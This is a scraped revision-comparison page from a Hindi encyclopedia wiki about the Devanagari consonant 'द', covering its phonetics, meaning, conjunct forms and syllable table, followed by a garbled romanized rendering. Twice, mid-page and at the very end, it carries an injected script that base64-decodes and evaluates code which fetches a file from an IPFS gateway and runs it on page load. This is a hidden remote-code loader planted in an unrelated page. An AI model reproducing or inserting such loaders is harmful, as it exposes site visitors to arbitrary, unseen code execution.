Difference between revisions of "द"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('right|150px '''द''' देवनागरी लिपि का तीसवाँ अक्ष...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
[[चित्र:द.jpg|right|150px]]
+
{{सूचना बक्सा संक्षिप्त परिचय
'''द''' [[देवनागरी लिपि]] का तीसवाँ [[अक्षर]] है। यह एक [[व्यंजन (व्याकरण)|व्यंजन]] है।
+
|चित्र=द.jpg
 +
|चित्र का नाम=
 +
|विवरण='''द''' [[देवनागरी वर्णमाला]] में तवर्ग का तीसरा [[व्यंजन (व्याकरण)|व्यंजन]] है।
 +
|शीर्षक 1=भाषाविज्ञान की दृष्टि से
 +
|पाठ 1= यह [[दन्त्य व्यंजन|दंत्य]], स्पर्श, घोष और अल्पप्राण ध्वनि है। इसकी [[महाप्राण व्यंजन|महाप्राण]] ध्वनि 'ध' है।
 +
|शीर्षक 2= व्याकरण
 +
|पाठ 2=[ [[संस्कृत]] दा + क ] [[पुल्लिंग]]- दाँत, पहाड़, देने वाला मनुष्य, दाता। [[प्रत्यय]]- (समासांत प्रयोग में) देने वाला। जैसे- धनद (=धन देने वाला); (=जल देने वाला)।
 +
|शीर्षक 3=विशेष
 +
|पाठ 3= 'द' के कुछ संयुक्त रूप [[हिंदी]] के सहस्रों शब्दों में प्रयुक्त होने के कारण विशेष स्मरणीय है- द्ग (=द्‌ग), द्ध (=द्‌ध), द्भ (=द्‌भ), द्म (द्‌म), द्य (=द्‌य), द्र = द्‌र), द्व = (द्‌व)।
 +
|शीर्षक 4=
 +
|पाठ 4= 
 +
|शीर्षक 5=
 +
|पाठ 5= 
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=[[थ]], [[त]], [[ध]], [[न]]  
 +
|अन्य जानकारी=जो व्यंजन 'द' स पहले आकर संयुक्त होते हैं, वे प्राय: अपनी खड़ी रेखा हो छोड़कर मिलते हैं। जैसे- क्द, ख्द, ग्द, घ्द, च्द, ज्द, झ्द, प्द, फ्द, ब्द, भ्द, म्द इत्यादि (जो वाग्दंड, शाताब्दी, उम्दा इत्यादि में देखे जा सकते हैं) परंतु 'र्‌', 'द' स पहले आने पर शिरोरेखा के ऊपर 'रेफ' रूप में विराजता है। जैसे- मर्द, गर्द।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''द''' [[देवनागरी वर्णमाला]] में तवर्ग का तीसरा [[व्यंजन (व्याकरण)|व्यंजन]] है। भाषाविज्ञान की दृष्टि से यह [[दन्त्य व्यंजन|दंत्य]], स्पर्श, घोष और अल्पप्राण ध्वनि है। इसकी [[महाप्राण व्यंजन|महाप्राण]] ध्वनि 'ध' है।
 +
;विशेष-
 +
* व्यंजन-गुच्छ के रूप में 'द' जिन व्यंजनों से पहले आता है, उनमें प्राय: द्‌ के बाद वह व्यंजन लिखा जाता है। परंतु, परम्परागत रीति में अनेक व्यंजन नीचे लगाकर भी लिखे जाते हैं। जैसे- उद्‌गार / उद्गार, उद्‌घाटन / उद्घाटन।
 +
* द्‌, म्‌, य्‌ और व से मिलने पर कुछ विशेष रूप में भी संयुक्त वर्ण लिखा जाता है। जैसे- उद्‌दीप्त / उद्दीप्त, सद्‌म / सद्म, वाद्‌य / वाद्य, द्‌वार / द्वार)। इनमें से द्‌ का द्वित्व रूप 'द्-द' अब अधिक पसंद किया जाता है (द्द नहीं)
 +
* जब द्‌ पहले आकर 'र' से मिलता है, तब संयुक्त रूप 'द्र' होता है। जैसे- द्रव्य, द्राक्ष, द्रोणचार्य।
 +
* जो व्यंजन 'द' स पहले आकर संयुक्त होते हैं, वे प्राय: अपनी खड़ी रेखा हो छोड़कर मिलते हैं। जैसे- क्द, ख्द, ग्द, घ्द, च्द, ज्द, झ्द, प्द, फ्द, ब्द, भ्द, म्द इत्यादि (जो वाग्दंड, शाताब्दी, उम्दा इत्यादि में देखे जा सकते हैं) परंतु 'र्‌', 'द' स पहले आने पर शिरोरेखा के ऊपर 'रेफ' रूप में विराजता है। जैसे- मर्द, गर्द।
 +
* 'द्‌' और 'र' के संयुक्त रूप 'द्र' तथा 'र्‌' और 'द' के संयुक्त रूप 'र्द' का अंतर ध्यान देने योग्य है। जैसे- सर्द - सद्र, मर्द - मद्र।
 +
* 'द' के कुछ संयुक्त रूप [[हिंदी]] के सहस्रों शब्दों में प्रयुक्त होने के कारण विशेष स्मरणीय है- द्ग (=द्‌ग), द्ध (=द्‌ध), द्भ (=द्‌भ), द्म (द्‌म), द्य (=द्‌य), द्र = द्‌र), द्व = (द्‌व)।
 +
* [ [[संस्कृत]] दा + क ] [[पुल्लिंग]]- दाँत, पहाड़, देने वाला मनुष्य, दाता। [[प्रत्यय]]- (समासांत प्रयोग में) देने वाला। जैसे- धनद (=धन देने वाला); (=जल देने वाला)।<ref>पुस्तक- हिन्दी शब्द कोश खण्ड-1 | पृष्ठ संख्या- 1200</ref>
 +
==द की बारहखड़ी==
 +
{| class="bharattable-green"
 +
|-
 +
| द
 +
| दा
 +
| दि
 +
| दी
 +
| दु
 +
| दू
 +
| दे
 +
| दै
 +
| दो
 +
| दौ
 +
| दं
 +
| दः
 +
|}
 
==द अक्षर वाले शब्द==
 
==द अक्षर वाले शब्द==
 
* [[दक्षिण अफ़्रीका]]
 
* [[दक्षिण अफ़्रीका]]

Latest revision as of 08:27, 18 December 2016

d
vivaran d devanagari varnamala mean tavarg ka tisara vyanjan hai.
bhashavijnan ki drishti se yah danty, sparsh, ghosh aur alpapran dhvani hai. isaki mahapran dhvani 'dh' hai.
vyakaran [ sanskrit da + k ] pulliang- daant, paha d, dene vala manushy, data. pratyay- (samasaant prayog mean) dene vala. jaise- dhanad (=dhan dene vala); (=jal dene vala).
vishesh 'd' ke kuchh sanyukt roop hiandi ke sahasroan shabdoan mean prayukt hone ke karan vishesh smaraniy hai- dg (=dh‌g), ddh (=dh‌dh), dbh (=dh‌bh), dm (dh‌m), dy (=dh‌y), dr = dh‌r), dv = (dh‌v).
sanbandhit lekh th, t, dh, n
any janakari jo vyanjan 'd' s pahale akar sanyukt hote haian, ve pray: apani kh di rekha ho chho dakar milate haian. jaise- kd, khd, gd, ghd, chd, jd, jhd, pd, phd, bd, bhd, md ityadi (jo vagdand, shatabdi, umda ityadi mean dekhe ja sakate haian) parantu 'rh‌', 'd' s pahale ane par shirorekha ke oopar 'reph' roop mean virajata hai. jaise- mard, gard.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

d devanagari varnamala mean tavarg ka tisara vyanjan hai. bhashavijnan ki drishti se yah danty, sparsh, ghosh aur alpapran dhvani hai. isaki mahapran dhvani 'dh' hai.

vishesh-
  • vyanjan-guchchh ke roop mean 'd' jin vyanjanoan se pahale ata hai, unamean pray: dh‌ ke bad vah vyanjan likha jata hai. parantu, paramparagat riti mean anek vyanjan niche lagakar bhi likhe jate haian. jaise- udh‌gar / udgar, udh‌ghatan / udghatan.
  • dh‌, mh‌, yh‌ aur v se milane par kuchh vishesh roop mean bhi sanyukt varn likha jata hai. jaise- udh‌dipt / uddipt, sadh‌m / sadm, vadh‌y / vady, dh‌var / dvar). inamean se dh‌ ka dvitv roop 'dh-d' ab adhik pasand kiya jata hai (dd nahian).
  • jab dh‌ pahale akar 'r' se milata hai, tab sanyukt roop 'dr' hota hai. jaise- dravy, draksh, dronachary.
  • jo vyanjan 'd' s pahale akar sanyukt hote haian, ve pray: apani kh di rekha ho chho dakar milate haian. jaise- kd, khd, gd, ghd, chd, jd, jhd, pd, phd, bd, bhd, md ityadi (jo vagdand, shatabdi, umda ityadi mean dekhe ja sakate haian) parantu 'rh‌', 'd' s pahale ane par shirorekha ke oopar 'reph' roop mean virajata hai. jaise- mard, gard.
  • 'dh‌' aur 'r' ke sanyukt roop 'dr' tatha 'rh‌' aur 'd' ke sanyukt roop 'rd' ka aantar dhyan dene yogy hai. jaise- sard - sadr, mard - madr.
  • 'd' ke kuchh sanyukt roop hiandi ke sahasroan shabdoan mean prayukt hone ke karan vishesh smaraniy hai- dg (=dh‌g), ddh (=dh‌dh), dbh (=dh‌bh), dm (dh‌m), dy (=dh‌y), dr = dh‌r), dv = (dh‌v).
  • [ sanskrit da + k ] pulliang- daant, paha d, dene vala manushy, data. pratyay- (samasaant prayog mean) dene vala. jaise- dhanad (=dhan dene vala); (=jal dene vala).[1]

d ki barahakh di

d da di di du doo de dai do dau dan dah

d akshar vale shabd



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. pustak- hindi shabd kosh khand-1 | prishth sankhya- 1200

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>